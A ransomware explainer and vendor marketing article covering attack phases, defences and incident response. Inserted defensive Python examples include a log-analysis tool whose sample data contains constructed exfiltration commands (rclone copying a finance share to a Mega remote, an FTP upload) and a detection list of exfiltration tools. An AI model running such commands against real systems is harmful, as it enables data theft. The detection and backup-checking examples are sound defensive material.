Ransomware is a type of malware that has become increasingly prevalent in the field of cybersecurity. This software encrypts an organization's data and demands a ransom in exchange for the decryption key.
The aim is to make that data inaccessible, preventing people from working and businesses from operating. These incidents have become more frequent and more complex in recent years: in 2024, ransomware attacks worldwide rose by 8.5% compared to 2023 (according to Ransomwatch).
This trend continued in 2025, with a 47% increase in cyberattacks, including ransomware, in the first quarter. Organizations faced an average of 1,925 attacks per week.
Ransomware targets are no longer limited to personal computers, but also include critical information systems of businesses and institutions, compromising the security of sensitive data and business continuity. Sophisticated ransomware groups such as Cl0p, Akira, and RansomHub exploit zero-day vulnerabilities and use AI-powered automated phishing techniques.
This article provides an in-depth analysis of ransomware mechanisms, their various types, how they work, and, most importantly, the defense strategies best suited to these growing threats. We will also discuss the steps to take in the event of an incident and best practices for avoiding common mistakes.
Ransomware is malicious software designed to block access to an organization's critical data or systems and demand a ransom to restore that access. Technically, ransomware relies on encryption, typically asymmetric: a public key encrypts the data and only the matching private key can decrypt it. Once installed, the malware contacts the attackers' command and control (C2) servers to obtain the instructions needed to carry out the attack.
Historically, the first ransomware dates back to the 1980s, but it was in the 2010s that its impact intensified, with notable incidents such as “WannaCry” in 2017. Since then, cybercriminals' techniques have evolved, incorporating sophisticated methods aimed at maximizing the effectiveness of attacks.
The emergence of the “Ransomware-as-a-Service” (RaaS) model illustrates this evolution. In this context, groups of cybercriminals offer preconfigured ransomware kits and support infrastructure to other criminals, often in exchange for a commission on the revenue generated. This democratization of ransomware tools allows a greater number of attackers, even those without advanced technical skills, to carry out effective attacks.
In addition, modern ransomware uses double extortion, combining data encryption with the threat of disclosing sensitive information, which increases the pressure on victims. Triple extortion also exists, notably with LockBit, the most prolific group, which adds DDoS attacks to force payment or extorts the victim's collateral victims as well.
Ransomware comes in several categories, each characterized by its own methods of exploitation and objectives:
Crypto ransomware (encrypting ransomware) is the most common type: it partially encrypts files and data on the system, making them inaccessible without the decryption key. Cybercriminals demand a ransom in exchange for this key, promising that the compromised data will be restored.
Locker ransomware locks the victim out of the system entirely by blocking access to files and applications. A ransom demand screen, often accompanied by a countdown timer, urges the victim to act quickly to regain access.
Scareware simulates the detection of a major problem, such as a virus infection, prompting the victim to pay for a fictitious solution. Although often a scam, some variants can partially or completely lock the computer.
The RaaS model allows groups of cybercriminals to offer preconfigured ransomware packages and support infrastructure to other malicious actors. This service often includes ransomware distribution, payment collection, and decryption key management, making it easier to spread attacks without requiring in-depth technical expertise.
Double extortion combines data encryption with the threat of disseminating stolen information. This method significantly increases the pressure on victims, who are faced with the simultaneous need to recover their data and the threat of losing sensitive information.
Ransomware attacks mainly target countries with less robust cybersecurity infrastructure, such as certain regions of Asia and Eastern Europe, as well as the United States and Western Europe due to their economic importance and data density. The geographical origins of the attackers are often linked to countries such as Russia and China, although the anonymity inherent in the internet makes it difficult to attribute responsibility with any certainty.
Doxware threatens to disclose personal or sensitive company information if the ransom is not paid. This approach doubles the pressure, demanding not only payment for decrypting the data, but also to prevent the public disclosure of confidential information.
A ransomware attack is a structured and multifaceted process, involving several phases from initial intrusion to encryption execution. Here are the key steps and typical entry vectors:
The most common entry vectors include:
• Phishing: sending emails or messages containing malicious links or attachments that install malware when opened.
• RDP (Remote Desktop Protocol): exploiting unsecured RDP connections or brute-forcing credentials to reach the internal network. This also covers any remote-access application that is exposed to the internet by design.
• Software vulnerabilities: exploiting unpatched flaws in software or systems to gain initial access.
• Removable devices: introducing malware via infected USB drives.
After initial access, the attack progresses through several phases:
• Reconnaissance and preparation: exploration of the network to identify weaknesses and sensitive data, which can take from a few minutes to several weeks. Before lateral movement there is often privilege escalation, whose goal is to widen access until the attackers control the entire IT infrastructure (e.g., access Active Directory as an administrator, then reach the backups to delete them, identify interesting file servers, access the hypervisors to simplify encryption, deploy GPOs for propagation, etc.).
• Establishment of a foothold: installation of persistence tools to maintain access even after a system reset.
• Lateral movement: propagation throughout the network by harvesting additional credentials and access privileges.
• Data exfiltration: transfer of data outside the organization when the objective includes information theft, often with cloud synchronization tools (rclone, etc.) or protocols such as FTP, to cloud destinations (Mega, Dropbox, FTP servers, etc.).
• Data encryption: encryption of files, making the data inaccessible without the decryption key.
The “dwell time,” the period during which attackers remain present in the network before launching the final attack, can range from a few hours to several months. This phase allows them to gather strategic information and prepare the ground to maximize the impact of the attack.
The attack on the Colonial Pipeline in 2021 illustrated the ability of ransomware to disrupt critical infrastructure. Similarly, the “WannaCry” ransomware in 2017 infected millions of systems around the world, highlighting the need for proactive cybersecurity defenses.
To protect yourself effectively against ransomware, it is essential to adopt a comprehensive and proactive security strategy. Here are seven actions recommended by the French National Agency for Information Systems Security (ANSSI) and other cybersecurity experts:
User training and awareness are essential to prevent ransomware attacks. Employees must be informed of the risks associated with phishing emails, infected attachments, and other attack vectors. Regular training programs and awareness campaigns help significantly reduce the risk of infection.
Regularly updating software, operating systems, and antivirus signatures is essential to patch vulnerabilities and prevent known security flaws from being exploited. This practice substantially reduces the risk of ransomware infection.
Performing regular data backups is the most effective measure for mitigating losses in the event of a ransomware attack. It is recommended to use offline storage solutions, such as external hard drives or magnetic tapes, to protect backups from infection of the main system. The recommendation for storing critical or sensitive data is the 3-2-1 rule: 3 copies of the data, in 2 locations and on 2 different technologies/hardware, including 1 offline (because attackers almost always delete online backups).
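To turn the 3-2-1 rule into something that can be checked rather than recited, here is an added example (my code, not the article's or Board of Cyber's) that evaluates a backup inventory against the rule and then models the behaviour the article warns about: an attacker deleting every backup reachable from the compromised network. The inventory format, the site and medium names and the two sample inventories are constructed for this example.

```python
"""Evaluate a backup inventory against the 3-2-1 rule and model the
attacker behaviour the article describes (online backups get deleted).
Added example with a constructed inventory format."""
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class BackupCopy:
    name: str
    location: str   # site where the copy lives, e.g. "hq-datacenter" (constructed)
    medium: str     # storage technology, e.g. "disk", "tape", "object-storage"
    online: bool    # True if reachable from the production network


def check_321(copies: Iterable[BackupCopy]) -> List[str]:
    """Return the list of 3-2-1 violations (empty means the inventory complies).
    The production data itself counts as one of the three copies."""
    copies = list(copies)
    problems = []
    if len(copies) < 3:
        problems.append(f"only {len(copies)} copies (need 3)")
    if len({c.location for c in copies}) < 2:
        problems.append("all copies in a single location (need 2)")
    if len({c.medium for c in copies}) < 2:
        problems.append("all copies on a single technology (need 2)")
    if not any(not c.online for c in copies):
        problems.append("no offline copy (need 1)")
    return problems


def survives_online_deletion(copies: Iterable[BackupCopy]) -> List[BackupCopy]:
    """Copies that remain after an attacker deletes everything reachable from the network."""
    return [c for c in copies if not c.online]


# Constructed inventories. WEAK looks fine on paper (3 copies, 2 sites, 2 technologies)
# but every copy is online; COMPLIANT adds an offline tape at a second site.
WEAK = [
    BackupCopy("production", "hq-datacenter", "disk", online=True),
    BackupCopy("nightly-replica", "hq-datacenter", "disk", online=True),
    BackupCopy("cloud-sync", "cloud-eu", "object-storage", online=True),
]
COMPLIANT = [
    BackupCopy("production", "hq-datacenter", "disk", online=True),
    BackupCopy("cloud-sync", "cloud-eu", "object-storage", online=True),
    BackupCopy("weekly-tape", "offsite-vault", "tape", online=False),
]

if __name__ == "__main__":
    for label, inventory in (("WEAK", WEAK), ("COMPLIANT", COMPLIANT)):
        print(label, "violations:", check_321(inventory) or "none")
        print(label, "left after online deletion:",
              [c.name for c in survives_online_deletion(inventory)])
```

The WEAK inventory is the common failure: three copies on two technologies in two locations, yet `survives_online_deletion` returns nothing, which is exactly the situation that makes paying the ransom look like the only option. A replica that the backup service account can delete is an online copy, whatever the vendor calls it.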
Segmenting the network into separate zones helps limit the spread of ransomware within the infrastructure. This approach involves restricting user access and privileges, as well as controlling Internet access, in accordance with the best practices recommended by ISO 27001.
User privilege management is a key preventive measure. By disabling administrator privileges for unauthorized users, you reduce the ability of attackers to move laterally within the network and access critical data.
Implementing intrusion detection and prevention tools (IDS/IPS) and anomaly detection solutions helps identify and block malicious activity before it causes significant damage. These tools must be regularly updated to remain effective against new threats, in accordance with NIST standards.
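One detection technique behind the anomaly-detection tools mentioned above is to score file writes by byte entropy: ciphertext is statistically indistinguishable from random data, so a burst of high-entropy writes in a short window is a strong signal of the encryption phase. The following added example (my code, not the article's or any vendor's) implements that check; the entropy threshold, window size, burst count and the sample write events are assumptions made for the demonstration.

```python
"""Flag the mass-encryption phase of a ransomware attack by scoring file
writes on byte entropy and looking for a burst of high-entropy writes.
Added example; thresholds and sample events are assumptions."""
import math
import os
from collections import Counter
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

HIGH_ENTROPY = 7.5             # bits per byte; ciphertext sits close to 8.0 (assumed threshold)
BURST_THRESHOLD = 5            # high-entropy writes within one window that trigger an alert
WINDOW = timedelta(seconds=60)

WriteEvent = Tuple[datetime, str, bytes]   # (timestamp, path, content written)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0 for a constant buffer, 8 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def detect_encryption_burst(events, window=WINDOW, threshold=BURST_THRESHOLD) -> Optional[datetime]:
    """Return the start of the first window holding >= threshold high-entropy writes, else None."""
    suspicious = sorted(ts for ts, _path, data in events if shannon_entropy(data) >= HIGH_ENTROPY)
    start = 0
    for end, ts in enumerate(suspicious):          # sliding window over suspicious timestamps
        while ts - suspicious[start] > window:
            start += 1
        if end - start + 1 >= threshold:
            return suspicious[start]
    return None


# Constructed sample activity (not real data): ordinary document edits over 10 minutes,
# then eight files overwritten with random bytes within a few seconds.
T0 = datetime(2025, 3, 6, 2, 0, 0)
PLAINTEXT = b"Quarterly report: revenue grew 4% while costs stayed flat. " * 64
BENIGN_EVENTS: List[WriteEvent] = [
    (T0 + timedelta(minutes=i), f"docs/report{i}.txt", PLAINTEXT) for i in range(10)
]
ATTACK_EVENTS: List[WriteEvent] = BENIGN_EVENTS + [
    (T0 + timedelta(minutes=30, seconds=i), f"docs/report{i}.txt.locked", os.urandom(4096))
    for i in range(8)
]

if __name__ == "__main__":
    print("plaintext entropy: %.2f bits/byte" % shannon_entropy(PLAINTEXT))
    print("benign burst:", detect_encryption_burst(BENIGN_EVENTS))
    print("attack burst starts at:", detect_encryption_burst(ATTACK_EVENTS))
```

Entropy alone produces false positives, because compressed archives, images and already-encrypted files are high-entropy too; that is why the check looks for a burst rate rather than a single write, and why real deployments pair it with other signals such as extension changes or writes to canary files that no legitimate process should touch.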
Developing an incident response plan is essential for effectively managing a ransomware attack. This plan should include procedures for isolating infected systems, restoring data from backups, and communicating with stakeholders. A well-defined communication strategy is also necessary to manage the fallout from the attack and minimize its impact on business operations.
In the event of a ransomware attack, a rapid and coordinated response is essential to minimize damage. CISO/CIO, here are the steps to follow and the best practices to adopt:
When the attack is detected, either by an employee or the technical teams, it is imperative to immediately isolate the affected systems from the rest of the network. This may include disconnecting Ethernet cables, disabling Wi-Fi, or powering down network equipment to prevent the malware from spreading.
Assess the scope of the attack by identifying the systems and data affected by encryption or exfiltration. Analyzing system logs can help detect early signs of the attack and reconstruct the timeline of events leading up to the infection.
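Reconstructing the timeline from logs is also where the attack phases described earlier become visible: the exfiltration tooling named there (rclone pushing data to cloud storage such as Mega or Dropbox, or a plain FTP client) leaves process-creation events, and the gap between the first such event and the moment the attack was noticed is the dwell time. The following added example (my code, not the article's or Board of Cyber's) parses a small set of constructed process-creation log lines, flags those indicators, orders the events and estimates the dwell time. The log format, the host names, the IP address and the command lines are all constructed for the example.

```python
"""Rebuild an attack timeline from process-creation logs, flag the
exfiltration tooling named in the article (rclone to cloud storage, FTP)
and estimate the dwell time. Added example with constructed log data."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Union

# Assumed log format for this example: "ISO timestamp | host | user | image | command line".
# These lines are constructed, not real telemetry; the IP is from a documentation range.
SAMPLE_LOG = """\
2025-03-02T08:14:07 | WS-042 | alice | C:\\Windows\\explorer.exe | explorer.exe
2025-03-02T08:15:33 | WS-042 | alice | C:\\Program Files\\Microsoft Office\\WINWORD.EXE | WINWORD.EXE /n invoice.docm
2025-03-05T23:41:10 | FS-01 | svc_backup | C:\\Users\\Public\\rclone.exe | rclone.exe copy \\\\FS-01\\Finance mega:dump --transfers 16
2025-03-05T23:58:02 | FS-01 | svc_backup | C:\\Windows\\System32\\ftp.exe | ftp.exe -s:upload.txt 203.0.113.7
2025-03-01T12:03:45 | WS-042 | alice | C:\\Windows\\System32\\cmd.exe | cmd.exe /c whoami
"""

# Cloud destinations the article lists for exfiltration; rclone names its remotes "<name>:".
CLOUD_REMOTES = ("mega", "dropbox", "ftp")


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    image: str
    cmdline: str
    tag: Optional[str] = None  # filled in by classify()


def parse_line(line: str) -> Event:
    parts = [p.strip() for p in line.split(" | ")]
    if len(parts) != 5:
        raise ValueError(f"unexpected log line: {line!r}")
    return Event(datetime.fromisoformat(parts[0]), *parts[1:])


def classify(ev: Event) -> Optional[str]:
    """Return a tag for events matching the article's exfiltration indicators, else None."""
    exe = ev.image.rsplit("\\", 1)[-1].lower()
    cmd = ev.cmdline.lower()
    if exe == "rclone.exe":
        remotes = [r for r in CLOUD_REMOTES if f"{r}:" in cmd]
        if remotes:
            return f"exfiltration: rclone to {remotes[0]}"
    if exe == "ftp.exe":
        return "exfiltration: ftp client"
    return None


def build_timeline(log_text: str) -> List[Event]:
    """Parse, tag and time-order the events (collected logs are rarely in order)."""
    events = [parse_line(line) for line in log_text.splitlines() if line.strip()]
    for ev in events:
        ev.tag = classify(ev)
    return sorted(events, key=lambda e: e.ts)


def dwell_time(events: List[Event], detected_at: datetime) -> Optional[timedelta]:
    """Time from the first flagged event to detection; None if nothing was flagged."""
    flagged = [e for e in events if e.tag]
    return detected_at - flagged[0].ts if flagged else None


def summarize(log_text: str, detected_at: Union[str, datetime]) -> dict:
    """Scope of the incident: flagged events, affected hosts and dwell time."""
    if isinstance(detected_at, str):
        detected_at = datetime.fromisoformat(detected_at)
    events = build_timeline(log_text)
    return {
        "flagged": [(e.ts.isoformat(), e.host, e.user, e.tag) for e in events if e.tag],
        "affected_hosts": sorted({e.host for e in events if e.tag}),
        "dwell_time": dwell_time(events, detected_at),
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG, detected_at="2025-03-06T07:30:00")
    for row in report["flagged"]:
        print(*row)
    print("affected hosts:", report["affected_hosts"])
    print("dwell time before detection:", report["dwell_time"])
```

Two things the example makes concrete: the earliest flagged event, not the ransom note, is the starting point for scoping, since backups and hosts touched before it may already be compromised; and the `whoami` line is deliberately left unflagged, because an indicator list built only from the tools named in this article will miss quieter reconnaissance, which is why the timeline should be reviewed by hand around the first hit.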
Make a list of systems that are critical to the organization and rank them in order of importance. This prioritization makes it easier to restore essential business functions in an orderly and efficient manner.
Ensure secure communication with technical teams and management using secure communication tools such as Signal or external conferencing systems. Create separate groups for technical managers, communicators, and executives to effectively coordinate the crisis response.
Set up a crisis management team to coordinate all necessary actions to restore IT systems. This team should include business professionals, communications experts, legal experts, and business recovery managers, aligned with a common strategy to resolve conflicting priorities during the restoration of operations. Call on an external CERT: +1 800 234 8000 | [email protected]
It is important to avoid the following mistakes during a ransomware attack:
• Paying the ransom without exploring all other options: payment does not guarantee the return of the data and may encourage the attackers.
• Contacting the cybercriminals directly: they know the psychological levers and cognitive biases of victims who are in a state of shock, denial, anger, intense stress, fatigue or guilt, and therefore vulnerable.
• Underestimating the impact of the attack: the consequences can be significant in legal, financial and reputational terms, and require comprehensive incident management.
Adopt the following best practices for effective incident management:
• Implement a segmentation and isolation plan: map the network and identify the segments to isolate quickly when systems are infected.
• Restore from backups: use reliable backups to restore the impacted data and systems.
• Document the incident: record every step taken in the response to improve future procedures and facilitate investigations.
Board of Cyber offers a comprehensive range of solutions and services designed to strengthen organizations' cybersecurity and protect them against ransomware threats. Here's how their offerings can help you:
The dashboards in Board of Cyber's Security Rating and AD Rating solutions provide comprehensive, continuous visibility into your organization's security posture. They centralize key information, enabling security teams to effectively monitor and manage ransomware-related risks and vulnerabilities.
Board of Cyber's AD Rating assesses the security of your Active Directory, a central component of enterprise networks. By protecting your Active Directory, you prevent ransomware attackers from exploiting access privileges and moving laterally across your network. This protection is essential for preventing attacks targeting administrator accounts and authentication systems.
With these tools and services, Board of Cyber offers a holistic approach to strengthening your security posture, detecting threats early, and responding effectively to ransomware attacks, minimizing risk and potential damage.
Board of Cyber's cyber rating assesses the maturity and effectiveness of your cybersecurity system. This assessment identifies areas for improvement and prioritizes security changes to strengthen your defense against ransomware and other cyber threats. Board of Cyber's maturity indicators measure your organization's level of preparedness and resilience against cyber threats. They identify gaps in security processes and policies, facilitating their improvement for better protection against ransomware.
Board of Cyber's compliance monitoring ensures that your organization complies with applicable security standards and regulations, such as ISO 27001, DORA, and NIS2. Ensuring compliance reduces the risk of vulnerabilities that can be exploited by ransomware attackers.
In summary, combating ransomware relies on rigorous governance and a strong security culture. Essential best practices include team awareness, keeping systems up to date, regular data backups, network segmentation, privilege restriction, deployment of detection tools, and development of an incident response plan.
These measures must be integrated into a robust security culture with clearly defined and regularly updated processes and policies. Solutions such as those offered by Board of Cyber can industrialize ransomware prevention and detection by providing dashboards, cybersecurity maturity assessments, and advanced alerting systems. It is imperative to act now by integrating these tools and practices into your cybersecurity strategy to protect your data and systems from these growing threats.